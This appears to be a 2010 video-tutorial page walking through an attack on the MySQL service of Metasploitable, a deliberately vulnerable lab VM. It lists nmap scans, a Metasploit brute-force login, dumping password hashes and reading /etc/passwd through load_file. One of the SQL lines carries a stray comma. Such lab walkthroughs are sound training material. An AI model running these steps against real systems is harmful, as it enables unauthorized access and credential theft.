Metasploitable - MySQL

This video demonstrates an attack on the MySQL database service on the metasploitable hackable box.

"Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com

Table of Contents

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/Metasploitable-MySQL.mp4

Download ([debian_ssh_rsa_2048_x86.tar.bz2][99]): *[Coming soon][99]*

Download (usernames.lst): Coming soon

Download (passwords.lst): Coming soon

Method

Use Nmap to scan the network (gathering information)
Use Nmap to do a more detailed scan of the target (gathering information)
Use Metasploit to brute force the login (gaining access)
By using MySQL client we are able to send commands to the database (Discover password hashes and reading files)

Tools

Nmap - on Backtrack 4 (Final)
Metasploit - on Backtrack 4 (Final)
MySQL - on Backtrack 4 (Final)
Dictionaries/Word-lists - *Coming soon*
Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)

Commands

nmap 192.168.1.1-255
nmap -sS -sV -O -f -n 192.168.1.105
msfconsole
search mysql
use scanner/mysql/mysql_login
show options
set RHOSTS 192.168.1.105
set USER_FILE /root/usernames.lst
set PASS_FILE /root/passwords.lst
exploit
mysql -h 192.168.1.105 -u root -p
root
show databases;
use mysql
show tables;
select User, Password, from user;
select load_file('/etc/passwd');

Notes

Song: Roberto Sol and Chris le Blanc; Ines - Sueno Damor

Video length: 3:24

Capture length: 9:14

Blog Post: https://blog.g0tmi1k.com/2010/07/metasploitable-mysql/